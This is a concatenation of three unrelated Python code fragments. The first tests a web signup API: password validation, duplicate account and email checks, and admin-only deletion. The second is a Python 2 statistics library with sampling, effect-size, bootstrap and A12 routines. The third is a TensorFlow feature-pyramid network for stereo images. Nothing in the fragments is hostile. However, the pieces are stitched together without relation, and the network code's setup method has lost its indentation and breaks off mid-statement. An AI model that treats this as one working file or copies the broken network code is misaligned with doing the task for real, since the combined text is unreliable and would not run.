        data['passwd'] = ''
        self._check(self._signup(data), 400,
                    'value of passwd: "" should not be empty value')

    def test_repasswd(self):
        """A missing or empty 'repasswd' field is rejected with 400."""
        data = {
            'email': config.user_test_email,
            'account': config.user_test_account,
            'passwd': config.user_test_password,
        }
        self._check(self._signup(data), 400, 'repasswd not in form')
        data['repasswd'] = ''
        self._check(self._signup(data), 400,
                    'value of repasswd: "" should not be empty value')

    def test_passwd_and_repasswd(self):
        """Mismatched passwd/repasswd is rejected with 400."""
        data = {
            'email': config.user_test_email,
            'account': config.user_test_account,
            'passwd': config.user_test_password,
            'repasswd': config.user_test_password + str(datetime.datetime.now()),
        }
        self._check(self._signup(data), 400, 'Confirm Two Password')

    def test_user_signup(self):
        """Full flow: cleanup, signup, duplicate checks, delete, re-signup."""
        # Remove any leftover test account from a previous run.
        res = requests.post("%s/api/users/signin/" % (config.base_url),
                            data={"account": config.user_test_account,
                                  "passwd": config.user_test_password})
        res.connection.close()
        if res.status_code == 200:
            admin_info = common.get_user_info({'account': config.user_admin_account, 'passwd': config.user_admin_password})
            test_info = common.get_user_info({'account': config.user_test_account, 'passwd': config.user_test_password})
            self._delete(test_info['id'], admin_info['token'])
        # A fresh signup of the test account succeeds.
        signup_data = {
            'email': config.user_test_email,
            'account': config.user_test_account,
            'passwd': config.user_test_password,
            'repasswd': config.user_test_password,
        }
        self._check(self._signup(signup_data), 200, '')
        # Re-using the account name (new email) is rejected.
        self._check(self._signup({
            'email': config.user_test_email + str(datetime.datetime.now()),
            'account': config.user_test_account,
            'passwd': config.user_test_password,
            'repasswd': config.user_test_password,
        }), 400, 'Account Exist')
        # Re-using the email (new account name) is rejected.
        self._check(self._signup({
            'email': config.user_test_email,
            'account': config.user_test_account + str(datetime.datetime.now()),
            'passwd': config.user_test_password,
            'repasswd': config.user_test_password,
        }), 400, 'Email Exist')
        # A non-admin user may not delete accounts.
        admin_info = common.get_user_info({'account': config.user_admin_account, 'passwd': config.user_admin_password})
        test_info = common.get_user_info({'account': config.user_test_account, 'passwd': config.user_test_password})
        self._check(self._delete(test_info['id'], test_info['token']),
                    403, 'Permission Denied')
        # The admin can delete the test account.
        admin_info = common.get_user_info({'account': config.user_admin_account, 'passwd': config.user_admin_password})
        test_info = common.get_user_info({'account': config.user_test_account, 'passwd': config.user_test_password})
        self._check(self._delete(test_info['id'], admin_info['token']),
                    200, {'id': str(test_info['id'])})
        # The freed account can sign up again.
        self._check(self._signup(signup_data), 200, '')
| |
from __future__ import division
import sys
from lib import *
from settings import *
sys.dont_write_bytecode = True
from numpy import log2
# XXXX what is k and why does Sym need it?
# Registry + runner.  Called with a function it registers (and returns) the
# function as a test; called with no argument it runs every cached test.
# The mutable default 'cache' is deliberate: it is the shared registry.
def test(f=None,cache=[]):
    if f:
        cache += [f]
        return f
    ok = no = 0
    for t in cache:
        print '#',t.func_name ,t.__doc__ or ''
        # Each test returns a flat list of alternating (expected, actual).
        prefix, n, found = None, 0, t() or []
        while found:
            this, that = found.pop(0), found.pop(0)
            if this == that:
                ok, n, prefix = ok+1, n+1,'CORRECT:'
            else:
                no, n, prefix = no+1, n+1,'WRONG :'
            print prefix,t.func_name,'test',n
    # Report the overall pass rate (skipped when nothing ran).
    if ok+no:
        print '\n# Final score: %s/%s = %s%% CORRECT' \
              % (ok,(ok+no),int(100*ok/(ok+no)))
class Thing(object):
    # Generic record: fields are set from keyword args and every instance is
    # stamped with a unique, monotonically increasing id used as its hash.
    id = -1  # class-level counter shared by all instances
    def __init__(i,**fields) :
        i.override(fields)
        i.newId()
    def newId(i):
        # Bump the shared counter and remember it on this instance.
        i._id = Thing.id = Thing.id + 1
    def also(i,**d)  : return i.override(d)
    def override(i,d): i.__dict__.update(d); return i
    def __hash__(i)  : return i._id
    # def __eq__(i,j)  : return i._id == j._id
    #def __neq__(i,j)  : return i._id != j._id
class Sym(Thing):
    # Symbol-frequency accumulator: tracks counts, mode and entropy.
    def __init__(i,inits=[],w=1):
        i.newId()
        i.selected=False
        i.w=w
        i.n,i.counts,i._also = 0,{},None
        for symbol in inits: i + symbol
    # NOTE: __add__/__sub__ are used statement-style ('s + x'); they mutate
    # the counts in place and deliberately return None.
    def __add__(i,symbol): i.inc(symbol, 1)
    def __sub__(i,symbol): i.inc(symbol, -1)
    def inc(i,x,n=1):
        i._also = None  # invalidate the cached summary
        i.n += n
        i.counts[x] = i.counts.get(x,0) + n
    def norm(i,x): return x
    def dist(i,x,y): return 0 if x==y else 1
    def far(i,x): return '~!@#$%^&*'
    def k(i) : return len(i.counts.keys())
    def centroid(i): return i.mode()
    def most(i): return i.also().most
    def mode(i): return i.also().mode
    def ent(i) : return i.also().e
    def also(i):
        # Lazily compute and cache (highest count, mode, Shannon entropy).
        if not i._also:
            e,most,mode = 0,0,None
            for symbol in i.counts:
                if i.counts[symbol] > most:
                    most,mode = i.counts[symbol],symbol
                p = i.counts[symbol]/i.n
                if p:
                    e -= p*log2(p)
            i._also = Thing(most=most,mode=mode,e=e)
            #print "also", i._also.e
        return i._also
@test
def symed():
    "Counting symbols"
    # Returns alternating (expected, actual): mode, top count, entropy (3dp).
    s=Sym(list('first kick I took was when I hit'))
    return [ ' ' , s.mode()
           , 7 , s.most()
           , 3.628 , round(s.ent(),3) ]
class Sample(Thing):
    "Keep a random sample of stuff seen so far."
    def __init__(i,inits=[],opts=The.sample):
        # _cache is the reservoir; n counts every item ever offered.
        i._cache,i.n,i.opts,i._also = [],0,opts,None
        for number in inits: i + number
    def __add__(i,x):
        # Reservoir sampling: keep the first opts.keep items verbatim, then
        # replace a random slot with probability opts.keep/n.
        i.n += 1
        if len(i._cache) < i.opts.keep: # if not full
            i._also = None
            i._cache += [x] # then add
        else: # otherwise, maybe replace an old item
            if random.random() <= i.opts.keep/i.n:
                i._also=None
                i._cache[int(random.random()*i.opts.keep)] = x
    def all(i) : return i._cache
    def median(i) : return i.also().median
    def iqr(i) : return i.also().iqr
    def breaks(i) : return i.also().breaks
    def also(i):
        # Lazily compute median, inter-quartile range and break points.
        if not i._also:
            lst = i._cache
            n = len(lst)
            lst = sorted(lst)
            p= q = max(0, int(n*0.5) - 1)
            r = int(n*(0.5 + i.opts.tiny))
            # 'dull': the smallest spread considered a real difference.
            dull = lst[r] - lst[p]
            if not oddp(n) : q = p + 1
            i._also = Thing(
                median = (lst[p] + lst[q])*0.5,
                iqr = lst[int(n*.75)] - lst[int(n*.5)],
                breaks = chops(lst, opts=i.opts,
                               sorted=True, dull=dull))
        return i._also
def chops(lst,sorted=False,dull=0,opts=The.sample):
    """Pick break points that split lst into (up to) opts.bins bins.

    Each successive break must exceed the previous one by more than *dull*
    and must leave at least opts.enough items after it.  Pass sorted=True
    when lst is already in ascending order.
    """
    def chop(bins, before, i):
        # Choose the next break after index i, or stop when too few remain.
        rest = len(lst) - i
        if rest < opts.enough:
            return []
        j = int(i + rest/bins)
        # Skip values not more than 'dull' above the previous break.
        while j < len(lst) and lst[j] <= before+dull:
            j += 1
        if j >= len(lst):
            return []
        now = lst[j]
        return [now] + chop(bins - 1, now,j)
    if not sorted:
        # BUG FIX: the parameter 'sorted' shadows the builtin, so the old
        # 'sorted(lst)' call on this path crashed with "'bool' object is not
        # callable".  Sort a copy via list.sort() instead (caller's list is
        # left untouched, matching the old intent).
        lst = list(lst)
        lst.sort()
    now = lst[0]
    return [now] + chop(opts.bins, now,0)
@test
def sampled():
    "Sampling up to 256 items in a distribution."
    # Returns alternating (expected, actual) break-point lists for three
    # distributions; gs2 rounds the floats for stable comparison.
    seed()
    s0= Sample([1,1,2,2,3]*100,
               sampleings(bins=2))
    s1= Sample([1,1,1,2]*20)
    s2= Sample([rand()**2 for _ in range(1000)],
               sampleings(bins=5))
    return [ [1,2], s0.breaks()
           , [1,2], s1.breaks()
           , [0, 0.09, 0.24, 0.41, 0.71],
             gs2(s2.breaks())]
class Num(Thing):
    """An accumulator for numbers.

    Tracks count/mean/M2 (Welford-style running moments) plus lo/hi bounds
    and a reservoir Sample of the values seen.
    """
    def __init__(i,init=[], opts=The.sample,w=1):
        i.newId()
        i.selected=False
        i.opts = opts
        i.w=w
        i.zero()
        for x in init: i + x
        # BUG FIX: removed the old 'for x in init: x=i.norm(i,x)' pass; the
        # bound-method call passed an extra argument (always a TypeError)
        # and its result was discarded anyway.
    def zero(i):
        # Reset every statistic; lo/hi start at +/- "infinity".
        i.lo,i.hi = 10**32,-10**32
        i.some = Sample([],i.opts)
        i.n = i.mu = i.m2 = 0
    def __lt__(i,j):
        return i.mu < j.mu
    # NOTE(review): the instance attribute 'n' (set in zero) shadows this
    # method, so it is effectively unreachable; kept for compatibility.
    def n(i): return i.some.n
    def sd(i) :
        # Sample standard deviation; with <2 items fall back to the mean.
        if i.n < 2: return i.mu
        else:
            return (max(0,i.m2)/(i.n - 1))**0.5
    def centroid(i): return i.median()
    def median(i): return i.some.median()
    def iqr(i): return i.some.iqr()
    def breaks(i): return i.some.breaks()
    def all(i) : return i.some.all()
    def __add__(i,x):
        # Statement-style update: extend the sample and Welford moments.
        if i.some: i.some + x
        if x > i.hi: i.hi = x
        if x < i.lo: i.lo = x
        i.n += 1
        delta = x - i.mu
        i.mu += delta/(1.0*i.n)
        i.m2 += delta*(x - i.mu)
    def __sub__(i,x):
        # Statement-style removal; the reservoir cannot un-see x, so drop it.
        i.some = None
        if i.n < 2: return i.zero()
        i.n -= 1
        delta = x - i.mu
        i.mu -= delta/(1.0*i.n)
        i.m2 -= delta*(x - i.mu)
    def dist(i,x,y,normalize=True):
        if normalize:
            x,y=i.norm(x),i.norm(y)
        return (x-y)**2
    def norm(i,x):
        # Min-max normalization; epsilon guards against lo == hi.
        return (x - i.lo)/ (i.hi - i.lo + 0.00001)
    def far(i,x):
        return i.lo if x > (i.hi - i.lo)/2 else i.hi
    def t(i,j):
        # Welch-style t statistic between two Nums.
        signal = abs(i.mu - j.mu)
        noise = (i.sd()**2/i.n + j.sd()**2/j.n)**0.5
        return signal / noise
    def cohen(i,j,small=The.math.brink.cohen):
        # Cohen's d effect size: True when the difference is negligible.
        v1 = i.sd()**2
        v2 = j.sd()**2
        a = (i.n - 1)*v1
        b = (j.n - 1)*v2
        c = i.n + j.n - 2
        s = ((a+b)/c)**0.5
        d = abs(i.mu - j.mu)
        return d/s < small
    def hedges(i,j,small=The.math.brink.hedges):
        "Hedges effect size test."
        num = (i.n - 1)*i.sd()**2 + (j.n - 1)*j.sd()**2
        denom = (i.n - 1) + (j.n - 1)
        sp = ( num / denom )**0.5
        delta = abs(i.mu - j.mu) / sp
        # Small-sample correction factor.
        c = 1 - 3.0 / (4*(i.n + j.n - 2) - 1)
        return delta * c < small
    def bootstrap(i,j,conf = The.math.brink.conf,
                  b = The.math.bootstraps):
        # Delegate to the module-level bootstrap() on the raw samples.
        return bootstrap(i.all(), j.all(),conf=conf,b=b)
    def a12(i,j,small=The.math.a12.small,
            reverse=The.math.a12.reverse):
        return a12(i.all(),j.all(),
                   reverse=reverse) < small
    def ttest(i,j,conf=The.math.brink.conf,
              threshold={.95:(( 1, 12.70 ),( 3, 3.182),
                              ( 5, 2.571),(10, 2.228),
                              ( 20, 2.086),(80, 1.99 ),
                              (320, 1.97 )),
                         .99:(( 1, 63.657),( 3, 5.841),
                              ( 5, 4.032),(10, 3.169),
                              ( 20, 2.845),(80, 2.64 ),
                              (320, 2.58 ))}):
        # Two-sided t-test using interpolated critical values.
        def interpolate(x, points):
            lo, hi = points[0], points[-1]
            x1, y1 = lo[0], lo[1]
            for x2,y2 in points[1:]:
                if x1 <= x <= x2:
                    deltay = y2 - y1
                    deltax = (x- x1)*1.0/(x2- x1)
                    return y1 + deltay * deltax
                x1,y1 = x2,y2
            return hi[1]
        def ttest1(n):
            return interpolate(n,threshold[conf])
        # BUG FIX: ttest1 takes only n; the old call passed a stray 'conf'
        # argument and always raised TypeError.
        return ttest1(i.n + j.n - 2) < i.t(j)
@test
def numed():
    # Check Num statistics and the effect-size/significance tests against
    # known values; returns alternating (expected, actual) pairs.
    def push(x,n=0.2):
        # Perturb x by up to n*100 percent (random noise).
        return x*(1 + n*rand())
    n1=Num(x for x in range(30))
    n2=Num(30+x for x in range(30))
    lst1 = [x for x in range(30)]
    n3, n4, n5 = Num(lst1), Num(), Num()
    for x in lst1: n4 + x; n5 + x
    for x in lst1: n5 - x
    n6 = Num(lst1)
    n7 = Num(push(x,0) for x in lst1)
    n8 = Num(push(x,0.1) for x in lst1)
    n9 = Num(push(x,1) for x in lst1)
    return [14.5, n1.mu
           ,8.80, g2(n1.sd())
           ,14.5, n1.median()
           ,30, n2.lo
           ,59, n2.hi
           ,True, n3.sd() == n4.sd()
           ,0, n5.sd()
           ,0, n5.n
           ,True, n8.cohen(n7)
           ,False,n9.cohen(n7)
           ,True, n8.hedges(n7)
           ,False,n9.hedges(n7)
           ,True, n8.bootstrap(n7)
           ,False,n9.bootstrap(n7)
           ]
def bootstrap(y,z,
              conf = The.math.brink.conf,
              b = The.math.bootstraps):
    """The bootstrap hypothesis test from p220 to 223
    of Efron's book 'Introduction to the bootstrap'."""
    def someTestStatistic(one,two):
        # Welch-like t statistic between two Num accumulators.
        s1,s2 = one.sd(), two.sd()
        delta = two.mu - one.mu
        if s1+s2:
            delta = delta/((s1/one.n + s2/two.n)**0.5)
        return delta
    # Pick a random element of lst.  NOTE: 'any' deliberately shadows the
    # builtin inside this function only.
    def one(lst): return lst[ int(any(len(lst))) ]
    def any(n) : return random.uniform(0,n)
    x = y + z
    xnum,ynum,znum = Num(x), Num(y), Num(z)
    tobs = someTestStatistic(ynum,znum)
    # Shift both samples onto the pooled mean (the null hypothesis).
    yhat = [y1 - ynum.mu + xnum.mu for y1 in y]
    zhat = [z1 - znum.mu + xnum.mu for z1 in z]
    bigger = 0.0
    # Count resampled statistics exceeding the observed one.
    for i in range(b):
        if someTestStatistic(
            Num(one(yhat) for _ in yhat),
            Num(one(zhat) for _ in zhat)) > tobs:
            bigger += 1
    return (bigger / b) <= conf
def a12gt(x,y):
    """Three-way comparator used by a12: the sign of (y - x)."""
    diff = y - x
    if diff > 0:
        return 1
    return -1 if diff < 0 else 0
def a12(lst1,lst2, gt= a12gt,
        reverse= The.math.a12.reverse):
    "how often is x in lst1 more than y in lst2?"
    # Fast merge-style computation of the Vargha-Delaney A12 statistic over
    # two pre-sorted lists (avoids the O(n*m) pairwise comparison).
    def loop(t,t1,t2):
        while t1.k < t1.n and t2.k < t2.n:
            h1 = t1.l[t1.k]
            h2 = t2.l[t2.k]
            h3 = t2.l[t2.k+1] if t2.k+1 < t2.n else None
            if gt(h1,h2) < 0:
                # Everything remaining in t2 beats h1.
                t1.k += 1; t1.gt += t2.n - t2.k
            elif h1 == h2:
                if h3 and gt(h1,h3) < 0:
                    t1.gt += t2.n - t2.k - 1
                t1.k += 1; t1.eq += 1; t2.eq += 1
            else:
                # Swap roles and continue the merge.
                t2,t1 = t1,t2
        return t.gt*1.0, t.eq*1.0
    #--------------------------
    if reverse:
        lst1,lst2 = lst2,lst1
    # NOTE(review): sorted(..., cmp=...) is Python 2 only.
    lst1 = sorted(lst1, cmp=gt)
    lst2 = sorted(lst2, cmp=gt)
    n1 = len(lst1)
    n2 = len(lst2)
    t1 = Thing(l=lst1,k=0,eq=0,gt=0,n=n1)
    t2 = Thing(l=lst2,k=0,eq=0,gt=0,n=n2)
    gt,eq= loop(t1, t1, t2)
    # Ties count half, matching the A12 definition.
    return (gt + eq/2)/(n1*n2)
def a12slow(lst1,lst2,rev=True):
    """How often is x in lst1 more than y in lst2? (O(n*m) reference.)

    Ties count half, per the Vargha-Delaney A12 definition; *rev* flips
    the direction of the comparison.
    """
    wins = ties = 0.0
    for left in lst1:
        for right in lst2:
            if left == right:
                ties += 1
            elif (left > right) if rev else (left < right):
                wins += 1
    return (wins + 0.5*ties) / (len(lst1)*len(lst2))
@test
def a12eged():
    # Smoke test: print the slow A12 statistic for two fixed benchmark
    # result vectors (no expected/actual pairs are returned).
    imc=[0.0467727930535
        ,0.107422839506
        ,0.143231939163
        ,0.196049098581
        ,0.214018838305 #5
        ,0.295759259259
        ,0.336425231415
        ,0.400960144928
        ,0.42 #10
        ,0.546434017595
        ,0.600305405094
        ,0.608229508197
        ,0.722651845971
        ,0.733923766816 # 1-
        ,0.780266115803
        ,1.260375
        ,1.30157738095
        ,1.37680851064
        ,14.6394]
    twopair=[0.0982951758956
            ,0.219622928726
            ,0.238561501328
            ,0.250163795386
            ,0.254009239283 #5
            ,0.271034376595
            ,0.311751739438
            ,0.314324693953
            ,0.477840168799
            ,0.522865519664 #10
            ,0.526105062302
            ,0.681018891615
            ,0.684250921515
            ,0.739683771336
            ,0.77830625818 #1
            ,0.812443866931
            ,0.850571338711
            ,1.42509168327
            ,1.4263754399]
    print "a12eg>",a12slow(twopair,imc)
@test
def a12ed(small=The.math.a12.small,
          repeats=100):
    # Check that the fast merge-based a12 agrees with the O(n*m) a12slow
    # on five pairs of random lists.
    def twolists():
        lst1 = [rand() for _ in range(repeats)]
        lst2 = [rand() for _ in range(repeats)]
        c1 = a12(lst1,lst2)
        c2 = a12slow(lst1,lst2)
        return c1==c2
    seed()
    return [ True, twolists(),
             True, twolists(),
             True, twolists(),
             True, twolists(),
             True, twolists()]
# Script entry point: run all tests registered via the @test decorator.
if __name__ == '__main__': eval(cmd())
| |
import tensorflow as tf
from networks.network import Network
from fcn.config import cfg
""" A network that produces dense features.
This particular network was heavily inspired by 'Feature Pyramid Networks for Object Detection' and adhere's more
closely to the paper than net_labeled_fpn.py
"""
class custom_network(Network):
    def __init__(self):
        """Build input placeholders, the feeding FIFO queue and the
        skip-link gating constants, then assemble the graph via setup().

        Inputs are stereo image pairs with ground-truth optical flow, an
        occlusion mask, and per-pixel labels for both views.
        """
        self.inputs = cfg.INPUT
        # self.input_format = input_format
        self.num_output_dimensions = 2 # formerly num_classes
        self.num_units = cfg.TRAIN.NUM_UNITS
        self.scale = 1 / cfg.TRAIN.SCALES_BASE[0]
        self.vertex_reg = cfg.TRAIN.VERTEX_REG
        # Placeholders; presumably NHWC with 3-channel RGB images — TODO confirm.
        self.data_left = tf.placeholder(tf.float32, shape=[None, None, None, 3])
        self.data_right = tf.placeholder(tf.float32, shape=[None, None, None, 3])
        self.gt_flow = tf.placeholder(tf.float32, shape=[None, None, None, self.num_output_dimensions])
        self.occluded = tf.placeholder(tf.int32, shape=[None, None, None, 1])
        self.labels_left = tf.placeholder(tf.int32, shape=[None, None, None, None])
        self.labels_right = tf.placeholder(tf.int32, shape=[None, None, None, None])
        self.keep_prob = tf.placeholder(tf.float32)
        self.queue_size = 20
        # define a queue: decouples the feed thread from the training step.
        self.q = tf.FIFOQueue(self.queue_size, [tf.float32, tf.float32, tf.float32, tf.int32, tf.int32, tf.int32, tf.float32])
        self.enqueue_op = self.q.enqueue([self.data_left, self.data_right, self.gt_flow, self.occluded, self.labels_left, self.labels_right, self.keep_prob])
        data_left, data_right, gt_flow, occluded, left_labels, right_labels, self.keep_prob_queue = self.q.dequeue()
        # Dequeued tensors become the named inputs of the layer graph.
        self.layers = dict({'data_left': data_left, 'data_right': data_right, 'gt_flow': gt_flow, 'occluded': occluded,
                            'left_labels': left_labels, "right_labels": right_labels})
        self.close_queue_op = self.q.close(cancel_pending_enqueues=True)
        self.queue_size_op = self.q.size('queue_size')
        self.trainable = cfg.TRAIN.TRAINABLE
        # Skip-link gates: a multiplier of 1.0 enables the link, 0.0 zeroes
        # it out while keeping the graph structure unchanged.
        if cfg.NET_CONF.CONV1_SKIP_LINK:
            self.skip_1_mult = tf.constant(1.0, tf.float32)
        else:
            self.skip_1_mult = tf.constant(0.0, tf.float32)
        if cfg.NET_CONF.CONV2_SKIP_LINK:
            self.skip_2_mult = tf.constant(1.0, tf.float32)
        else:
            self.skip_2_mult = tf.constant(0.0, tf.float32)
        if cfg.NET_CONF.CONV3_SKIP_LINK:
            self.skip_4_mult = tf.constant(1.0, tf.float32)
        else:
            self.skip_4_mult = tf.constant(0.0, tf.float32)
        self.setup()
def setup(self):
trainable = self.trainable
reuse = True
feature_len = 128
# scaled versions of ground truth
(self.feed('gt_flow')
.avg_pool(2, 2, 2, 2, name='flow_pool1')
.div_immediate(tf.constant(2.0, tf.float32), name='gt_flow_2x')
.avg_pool(2, 2, 2, 2, name='flow_pool2')
.div_immediate(tf.constant(2.0, tf.float32), name='gt_flow_4x')
.avg_pool(2, 2, 2, 2, name='flow_pool3')
.div_immediate(tf.constant(2.0, tf.float32), name='gt_flow_8x')
.avg_pool(2, 2, 2, 2, name='flow_pool4')
.div_immediate(tf.constant(2.0, tf.float32), name='gt_flow_16x'))
(self.feed('occluded').cast(tf.float32)
.avg_pool(2, 2, 2, 2, name='occluded_2x_avg')
.avg_pool(2, 2, 2, 2, name='occluded_4x_avg')
.avg_pool(2, 2, 2, 2, name='occluded_8x_avg')
.avg_pool(2, 2, 2, 2, name='occluded_16x_avg'))
self.feed('occluded_2x_avg').round().cast(tf.int32, name="occluded_2x")
self.feed('occluded_4x_avg').round().cast(tf.int32, name="occluded_4x")
self.feed('occluded_8x_avg').round().cast(tf.int32, name="occluded_8x")
self.feed('occluded_16x_avg').round().cast(tf.int32, name="occluded_16x")
(self.feed('left_labels').cast(tf.float32)
.avg_pool(2, 2, 2, 2, name='left_labels_2x_avg')
.avg_pool(2, 2, 2, 2, name='left_labels_4x_avg')
.avg_pool(2, 2, 2, 2, name='left_labels_8x_avg')
.avg_pool(2, 2, 2, 2, name='left_labels_16x_avg'))
self.feed('left_labels_2x_avg').round().cast(tf.int32, name="left_labels_2x")
self.feed('left_labels_4x_avg').round().cast(tf.int32, name="left_labels_4x")
self.feed('left_labels_8x_avg').round().cast(tf.int32, name="left_labels_8x")
self.feed('left_labels_16x_avg').round().cast(tf.int32, name="left_labels_16x")
(self.feed('right_labels').cast(tf.float32)
.avg_pool(2, 2, 2, 2, name='right_labels_2x_avg')
.avg_pool(2, 2, 2, 2, name='right_labels_4x_avg')
.avg_pool(2, 2, 2, 2, name='right_labels_8x_avg')
.avg_pool(2, 2, 2, 2, name='right_labels_16x_avg'))
self.feed('right_labels_2x_avg').round().cast(tf.int32, name="right_labels_2x")
self.feed('right_labels_4x_avg').round().cast(tf.int32, name="right_labels_4x")
self.feed('right_labels_8x_avg').round().cast(tf.int32, name="right_labels_8x")
self.feed('right_labels_16x_avg').round().cast(tf.int32, name="right_labels_16x")
# left tower
(self.feed('data_left')
.add_immediate(tf.constant(0.0, tf.float32), name='data_left_tap')
.conv(3, 3, 64, 1, 1, name='conv1_1', c_i=3, trainable=trainable)
.conv(3, 3, 64, 1, 1, name='conv1_2', c_i=64, trainable=trainable)
.add_immediate(tf.constant(0.0, tf.float32), name='conv1_l')
.max_pool(2, 2, 2, 2, name='pool1')
.conv(3, 3, 128, 1, 1, name='conv2_1', c_i=64, trainable=trainable)
.conv(3, 3, 128, 1, 1, name='conv2_2', c_i=128, trainable=trainable)
.add_immediate(tf.constant(0.0, tf.float32), name='conv2_l')
.max_pool(2, 2, 2, 2, name='pool2')
.conv(3, 3, 256, 1, 1, name='conv3_1', c_i=128, trainable=trainable)
.conv(3, 3, 256, 1, 1, name='conv3_2', c_i=256, trainable=trainable)
.conv(3, 3, 256, 1, 1, name='conv3_3', c_i=256, trainable=trainable)
.add_immediate(tf.constant(0.0, tf.float32), name='conv3_l')
.max_pool(2, 2, 2, 2, name='pool3')
.conv(3, 3, 512, 1, 1, name='conv4_1', c_i=256, trainable=trainable)
.conv(3, 3, 512, 1, 1, name='conv4_2', c_i=512, trainable=trainable)
.conv(3, 3, 512, 1, 1, name='conv4_3', c_i=512, trainable=trainable)
.add_immediate(tf.constant(0.0, tf.float32), name='conv4_3_l')
.max_pool(2, 2, 2, 2, name='pool4')
.conv(3, 3, 512, 1, 1, name='conv5_1', c_i=512, trainable=trainable)
.conv(3, 3, 512, 1, 1, name='conv5_2', c_i=512, trainable=trainable)
.conv(3, 3, 512, 1, 1, name='conv5_3', c_i=512, trainable=trainable)
.add_immediate(tf.constant(0.0, tf.float32), name='conv5_3_l'))
# 16x scaling input
(self.feed('conv5_3_l')
.conv(1, 1, feature_len, 1, 1, name='16_conv_1', c_i=512, elu=True)
# .conv(1, 1, 128, 1, 1, name='16_conv_2', c_i=128, elu=True, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='features_16x_l')
.deconv(4, 4, feature_len, 2, 2, name='upscale_16x_l', trainable=False))
# 8x scaling input
(self.feed('conv4_3_l')
.conv(1, 1, feature_len, 1, 1, name='8x_skip_cov_1', c_i=512, relu=False)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_8x_l'))
(self.feed('upscale_16x_l', 'skip_link_8x_l')
.add(name='8_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_8x_l')
.conv(3, 3, feature_len, 1, 1, name='8x_conv_2', relu=False)
.deconv(4, 4, feature_len, 2, 2, name='upscale_8x_l', trainable=False))
# 4x scaling input
(self.feed('conv3_l')
.conv(1, 1, feature_len, 1, 1, name='4x_skip_cov_1', c_i=256, relu=False)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_4x_l'))
(self.feed('upscale_8x_l', 'skip_link_4x_l')
.add(name='4_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_4x_l')
.conv(3, 3, feature_len, 1, 1, name='4x_conv_2', relu=False)
.deconv(4, 4, feature_len, 2, 2, name='upscale_4x_l', trainable=False))
# 2x scaling input
(self.feed('conv2_l')
.conv(1, 1, feature_len, 1, 1, name='2x_skip_cov_1', c_i=128, relu=False)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_2x_l'))
(self.feed('upscale_4x_l', 'skip_link_2x_l')
.add(name='2_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_2x_l')
.conv(3, 3, feature_len, 1, 1, name='2x_conv_2', relu=False)
.deconv(4, 4, feature_len, 2, 2, name='upscale_2x_l', trainable=False))
# # 1x scaling input
# (self.feed('conv1_l')
# .conv(1, 1, feature_len, 1, 1, name='1x_skip_cov_1', c_i=64, relu=False)
# .add_immediate(tf.constant(0.0, tf.float32), name='skip_link_1x_l'))
# (self.feed('upscale_2x_l', 'skip_link_1x_l')
# .add(name='1_add')
# .add_immediate(tf.constant(0.0, tf.float32), name='features_1x_l'))
# right tower
(self.feed('data_right')
.add_immediate(tf.constant(0.0, tf.float32), name='data_right_tap')
.conv(3, 3, 64, 1, 1, name='conv1_1', c_i=3, trainable=trainable, reuse=reuse)
.conv(3, 3, 64, 1, 1, name='conv1_2', c_i=64, trainable=trainable, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='conv1_r')
.max_pool(2, 2, 2, 2, name='pool1')
.conv(3, 3, 128, 1, 1, name='conv2_1', c_i=64, trainable=trainable, reuse=reuse)
.conv(3, 3, 128, 1, 1, name='conv2_2', c_i=128, trainable=trainable, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='conv2_r')
.max_pool(2, 2, 2, 2, name='pool2')
.conv(3, 3, 256, 1, 1, name='conv3_1', c_i=128, trainable=trainable, reuse=reuse)
.conv(3, 3, 256, 1, 1, name='conv3_2', c_i=256, trainable=trainable, reuse=reuse)
.conv(3, 3, 256, 1, 1, name='conv3_3', c_i=256, trainable=trainable, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='conv3_r')
.max_pool(2, 2, 2, 2, name='pool3')
.conv(3, 3, 512, 1, 1, name='conv4_1', c_i=256, trainable=trainable, reuse=reuse)
.conv(3, 3, 512, 1, 1, name='conv4_2', c_i=512, trainable=trainable, reuse=reuse)
.conv(3, 3, 512, 1, 1, name='conv4_3', c_i=512, trainable=trainable, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='conv4_3_r')
.max_pool(2, 2, 2, 2, name='pool4')
.conv(3, 3, 512, 1, 1, name='conv5_1', c_i=512, trainable=trainable, reuse=reuse)
.conv(3, 3, 512, 1, 1, name='conv5_2', c_i=512, trainable=trainable, reuse=reuse)
.conv(3, 3, 512, 1, 1, name='conv5_3', c_i=512, trainable=trainable, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='conv5_3_r'))
# 16x scaling input
(self.feed('conv5_3_r')
.conv(1, 1, feature_len, 1, 1, name='16_conv_1', c_i=512, elu=True, reuse=reuse)
# .conv(1, 1, 128, 1, 1, name='16_conv_2', c_i=128, elu=True, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='features_16x_r')
.deconv(4, 4, feature_len, 2, 2, name='upscale_16x_r', trainable=False))
# 8x scaling input
(self.feed('conv4_3_r')
.conv(1, 1, feature_len, 1, 1, name='8x_skip_cov_1', c_i=512, relu=False, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_8x_r'))
(self.feed('upscale_16x_r', 'skip_link_8x_r')
.add(name='8_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_8x_r')
.conv(3, 3, feature_len, 1, 1, name='8x_conv_2', relu=False, reuse=reuse)
.deconv(4, 4, feature_len, 2, 2, name='upscale_8x_r', trainable=False))
# 4x scaling input
(self.feed('conv3_r')
.conv(1, 1, feature_len, 1, 1, name='4x_skip_cov_1', c_i=256, relu=False, reuse=reuse)
.add_immediate(tf.constant(0.0, tf.float32), name='skip_link_4x_r'))
(self.feed('upscale_8x_r', 'skip_link_4x_r')
.add(name='4_add')
.add_immediate(tf.constant(0.0, tf.float32), name='features_4x_r')
.conv(3, 3, feature_len, 1, 1, name='4x_conv_2', relu=False, reuse=reuse)
.deconv(4, 4, feature_len, 2, 2, name='upscale_4x_r', trainable=False))
# 2x scaling input
(self.feed('conv2_r')
